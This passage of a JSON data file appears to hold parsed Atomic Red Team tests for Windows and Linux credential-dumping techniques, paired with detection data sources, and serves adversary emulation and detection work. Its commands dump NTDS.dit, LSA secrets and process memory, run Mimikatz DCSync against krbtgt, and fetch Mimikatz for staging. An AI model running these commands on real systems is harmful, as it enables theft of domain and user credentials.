Controller\n", + "prereq_command": "reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\ProductOptions /v ProductType | findstr LanmanNT\n", + "get_prereq_command": "echo Sorry, Promoting this machine to a Domain Controller must be done manually\n" + }, + { + "description": "Volume shadow copy must exist\n", + "prereq_command": "if not exist #{vsc_name} (exit /b 1)\n", + "get_prereq_command": "echo Run \"Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with vssadmin'\" to fulfill this requirement\n" + }, + { + "description": "Extract path must exist\n", + "prereq_command": "if not exist #{extract_path} (exit /b 1)\n", + "get_prereq_command": "mkdir #{extract_path}\n" + } + ], + "executor": { + "command": "copy #{vsc_name}\\Windows\\NTDS\\NTDS.dit #{extract_path}\\ntds.dit\ncopy #{vsc_name}\\Windows\\System32\\config\\SYSTEM #{extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM #{extract_path}\\SYSTEM_HIVE\n", + "cleanup_command": "del \"#{extract_path}\\ntds.dit\" >nul 2> nul\ndel \"#{extract_path}\\VSC_SYSTEM_HIVE\" >nul 2> nul\ndel \"#{extract_path}\\SYSTEM_HIVE\" >nul 2> nul\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Dump Active Directory Database with NTDSUtil", + "auto_generated_guid": "2364e33d-ceab-4641-8468-bfb1d7cc2723", + "description": "This test is intended to be run on a domain Controller.\n\nThe Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. 
This capability\nuses the \"IFM\" or \"Install From Media\" backup functionality that allows Active Directory restoration or installation of\nsubsequent domain controllers without the need of network-based replication.\n\nUpon successful completion, you will find a copy of the ntds.dit file in the C:\\Windows\\Temp directory.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_folder": { + "description": "Path where resulting dump should be placed", + "type": "Path", + "default": "C:\\Windows\\Temp\\ntds_T1003" + } + }, + "dependencies": [ + { + "description": "Target must be a Domain Controller\n", + "prereq_command": "reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\ProductOptions /v ProductType | findstr LanmanNT\n", + "get_prereq_command": "echo Sorry, Promoting this machine to a Domain Controller must be done manually\n" + } + ], + "executor": { + "command": "mkdir #{output_folder}\nntdsutil \"ac i ntds\" \"ifm\" \"create full #{output_folder}\" q q\n", + "cleanup_command": "rmdir /q /s #{output_folder} >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Create Volume Shadow Copy with WMI", + "auto_generated_guid": "224f7de0-8f0a-4a94-b5d8-989b036c86da", + "description": "This test is intended to be run on a domain Controller.\n\nThe Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "drive_letter": { + "description": "Drive letter to source VSC (including colon and backslash)", + "type": "String", + "default": "C:\\" + } + }, + "dependencies": [ + { + "description": "Target must be a Domain Controller\n", + "prereq_command": "reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\ProductOptions /v ProductType | findstr LanmanNT\n", + "get_prereq_command": "echo Sorry, Promoting this machine to a Domain Controller must be done manually\n" + } + ], + 
"executor": { + "command": "wmic shadowcopy call create Volume=#{drive_letter}\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Create Volume Shadow Copy remotely with WMI", + "auto_generated_guid": "d893459f-71f0-484d-9808-ec83b2b64226", + "description": "This test is intended to be run from a remote workstation with domain admin context.\nThe Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "drive_letter": { + "description": "Drive letter to source VSC (including colon and backslash)", + "type": "String", + "default": "C:\\" + }, + "target_host": { + "description": "IP Address / Hostname you want to target", + "type": "String", + "default": "localhost" + } + }, + "dependencies": [ + { + "description": "Target must be a reachable Domain Controller, and current context must be domain admin\n", + "prereq_command": "wmic /node:\"#{target_host}\" shadowcopy list brief\n", + "get_prereq_command": "echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)\n" + } + ], + "executor": { + "command": "wmic /node:\"#{target_host}\" shadowcopy call create Volume=#{drive_letter}\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Create Volume Shadow Copy remotely (WMI) with esentutl", + "auto_generated_guid": "21c7bf80-3e8b-40fa-8f9d-f5b194ff2865", + "description": "This test is intended to be run from a remote workstation with domain admin context.\nThe Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "source_path": { + "description": "File to shadow copy", + "type": "String", + "default": "c:\\windows\\ntds\\ntds.dit" + }, + "target_path": { + "description": "Target path of the result file", + "type": "String", + 
"default": "c:\\ntds.dit" + }, + "target_host": { + "description": "IP Address / Hostname you want to target", + "type": "String", + "default": "localhost" + } + }, + "dependencies": [ + { + "description": "Target must be a reachable Domain Controller, and current context must be domain admin\n", + "prereq_command": "wmic /node:\"#{target_host}\" shadowcopy list brief\n", + "get_prereq_command": "echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)\n" + } + ], + "executor": { + "command": "wmic /node:\"#{target_host}\" process call create \"cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}\"\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Create Volume Shadow Copy with Powershell", + "auto_generated_guid": "542bb97e-da53-436b-8e43-e0a7d31a6c24", + "description": "This test is intended to be run on a domain Controller.\n\nThe Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "drive_letter": { + "description": "Drive letter to source VSC (including colon)", + "type": "String", + "default": "C:\\" + } + }, + "executor": { + "command": "(gwmi -list win32_shadowcopy).Create('#{drive_letter}','ClientAccessible')\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Create Symlink to Volume Shadow Copy", + "auto_generated_guid": "21748c28-2793-4284-9e07-d6d028b66702", + "description": "This test is intended to be run on a domain Controller.\n\nThe Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "drive_letter": { + "description": "Drive letter to source VSC (including colon)", + "type": "String", + "default": "C:" + }, + "symlink_path": { + "description": "symlink path", + "type": "String", + "default": 
"C:\\Temp\\vssstore" + } + }, + "executor": { + "command": "vssadmin.exe create shadow /for=#{drive_letter}\nmklink /D #{symlink_path} \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": 
"Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1003.004", + "command_list": [ + "PathToAtomicsFolder\\T1003.004\\bin\\PsExec.exe -accepteula -s reg save HKLM\\security\\policy\\secrets %temp%\\secrets /y" + ], + "commands": [ + { + "command": "PathToAtomicsFolder\\T1003.004\\bin\\PsExec.exe -accepteula -s reg save HKLM\\security\\policy\\secrets %temp%\\secrets /y", + "source": "atomics/T1003.004/T1003.004.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSA Secrets" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1003.004", + "display_name": "OS Credential Dumping: LSA Secrets", + "atomic_tests": [ + { + "name": "Dumping LSA Secrets", + "auto_generated_guid": "55295ab0-a703-433b-9ca4-ae13807de12f", + "description": "Dump secrets key from Windows registry\nWhen successful, the dumped file will be written to $env:Temp\\secrets.\nAttackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information.\nhttps://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "psexec_exe": { + "description": "Path to PsExec executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1003.004\\bin\\PsExec.exe" + } + }, + 
"dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})", + "prereq_command": "if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"$env:TEMP\\PSTools.zip\"\nExpand-Archive $env:TEMP\\PSTools.zip $env:TEMP\\PSTools -Force\nNew-Item -ItemType Directory (Split-Path #{psexec_exe}) -Force | Out-Null\nCopy-Item $env:TEMP\\PSTools\\PsExec.exe #{psexec_exe} -Force" + } + ], + "executor": { + "command": "#{psexec_exe} -accepteula -s reg save HKLM\\security\\policy\\secrets %temp%\\secrets /y", + "cleanup_command": "del %temp%\\secrets >nul 2> nul", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], 
+ "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + 
"https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1003.005", + "command_list": [ + "cmdkey /list\n" + ], + "commands": [ + { + "command": "cmdkey /list\n", + "source": "atomics/T1003.005/T1003.005.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Cached Domain Credentials" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1003.005", + "display_name": "OS Credential Dumping: Cached Domain Credentials", + "atomic_tests": [ + { + "name": "Cached Credential Dump via Cmdkey", + "auto_generated_guid": "56506854-89d6-46a3-9804-b7fde90791f9", + "description": "List credentials currently stored on the host via the built-in Windows utility cmdkey.exe\nCredentials listed with Cmdkey only pertain to the current user\nPasswords will not be displayed once they are stored\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey\nhttps://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "cmdkey /list\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script 
interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1003.006", + "command_list": [ + "#{mimikatz_path} \"lsadump::dcsync /domain:%userdnsdomain% /user:#{user}@%userdnsdomain%\" \"exit\"\n", + "#{mimikatz_path} \"lsadump::dcsync /domain:#{domain} /user:krbtgt@#{domain}\" \"exit\"\n", + "%tmp%\\mimikatz\\x64\\mimikatz.exe \"lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}\" \"exit\"\n", + "Get-ADReplAccount -All -Server $ENV:logonserver.TrimStart(\"\\\")\n" + ], + "commands": [ + { + "command": "#{mimikatz_path} \"lsadump::dcsync /domain:%userdnsdomain% /user:#{user}@%userdnsdomain%\" \"exit\"\n", + "source": "atomics/T1003.006/T1003.006.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: DCSync" + }, + { + "command": "#{mimikatz_path} \"lsadump::dcsync /domain:#{domain} /user:krbtgt@#{domain}\" \"exit\"\n", + "source": "atomics/T1003.006/T1003.006.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: DCSync" + }, + { + "command": "%tmp%\\mimikatz\\x64\\mimikatz.exe \"lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}\" \"exit\"\n", + "source": "atomics/T1003.006/T1003.006.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: DCSync" + }, + { + "command": "Get-ADReplAccount -All -Server $ENV:logonserver.TrimStart(\"\\\")\n", + "source": "atomics/T1003.006/T1003.006.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: DCSync" + } + ], + 
"parsed_datasets": [ + { + "attack_technique": "T1003.006", + "display_name": "OS Credential Dumping: DCSync", + "atomic_tests": [ + { + "name": "DCSync (Active Directory)", + "auto_generated_guid": "129efd28-8497-4c87-a1b0-73b9a870ca3e", + "description": "Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.\nWorks against a remote Windows Domain Controller using the replication protocol.\nPrivileges required: domain admin or domain controller account (by default), or any other account with required rights.\n[Reference](https://adsecurity.org/?p=1729)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain": { + "description": "Targeted Active Directory domain", + "type": "String", + "default": "%userdnsdomain%" + }, + "user": { + "description": "Targeted user", + "type": "String", + "default": "krbtgt" + }, + "mimikatz_path": { + "description": "Mimikatz windows executable", + "type": "Path", + "default": "%tmp%\\mimikatz\\x64\\mimikatz.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})\n", + "prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\nif (Test-Path $mimikatz_path) {exit 0} else {exit 1}\n", + "get_prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\n$mimikatz_relative_uri = Invoke-WebRequest \"https://github.com/gentilkiwi/mimikatz/releases/latest\" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like \"*/mimikatz_trunk.zip\" | Select-Object -ExpandProperty href\nInvoke-WebRequest \"https://github.com$mimikatz_relative_uri\" -UseBasicParsing -OutFile \"$env:TEMP\\mimikatz.zip\"\nExpand-Archive $env:TEMP\\mimikatz.zip $env:TEMP\\mimikatz -Force\nNew-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null\nMove-Item $env:TEMP\\mimikatz\\x64\\mimikatz.exe 
$mimikatz_path -Force\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "#{mimikatz_path} \"lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}\" \"exit\"\n" + } + }, + { + "name": "Run DSInternals Get-ADReplAccount", + "auto_generated_guid": "a0bced08-3fc5-4d8b-93b7-e8344739376e", + "description": "The following Atomic will run Get-ADReplAccount from DSInternals.\nUpon successful execution, domain and credentials will appear in stdout. \n[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellerParticle.\nhttps://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "logonserver": { + "description": "ComputerName argument default %logonserver%", + "type": "String", + "default": "$ENV:logonserver.TrimStart(\"\\\")" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "DSInternals must be installed\n", + "prereq_command": "$RequiredModule = Get-Module -Name DSInternals -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}\n", + "get_prereq_command": "Install-Module -Name DSInternals -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Get-ADReplAccount -All -Server #{logonserver}\n", + "name": "powershell", + "elevation_required": false + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object access", + "description": "An active directory object was accessed.", + 
"source_data_element": "user", + "relationship": "accessed", + "target_data_element": "ad object" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object access", + "description": "An active directory object was accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "ad object" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + null + ] + }, + { + "technique_id": "T1003.007", + "command_list": [ + "sh #{script_path}\nPID=$(pgrep -n -f \"#{pid_term}\")\nHEAP_MEM=$(grep -E \"^[0-9a-f-]* r\" /proc/\"$PID\"/maps | grep heap | cut -d' ' -f 1)\nMEM_START=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f1))))\nMEM_STOP=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f2))))\nMEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"/tmp/T1003.007.bin\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\ngrep -i \"PASS\" \"/tmp/T1003.007.bin\"\n", + "sh /tmp/T1003.007.sh\nPID=$(pgrep -n -f \"#{pid_term}\")\nHEAP_MEM=$(grep -E \"^[0-9a-f-]* r\" /proc/\"$PID\"/maps | grep 
